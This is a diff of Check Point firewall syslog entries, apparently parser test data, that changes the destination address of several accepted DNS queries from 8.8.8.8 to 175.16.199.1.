 <134>1 2020-03-29T16:51:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d228,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50040"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:51:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d229,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500713"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43882"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d229,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500713"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45089"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500714"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40923"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60127"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500714"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40923"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60127"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:57Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d22d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33716"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:51:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22f,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500719"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37557"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43215"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51934"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54308"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34739"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57495"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49150"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d238,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45367"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d239,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500729"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57495"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49150"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d238,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45367"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d239,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500729"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:11Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500731"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57721"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:11Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500731"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d23d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
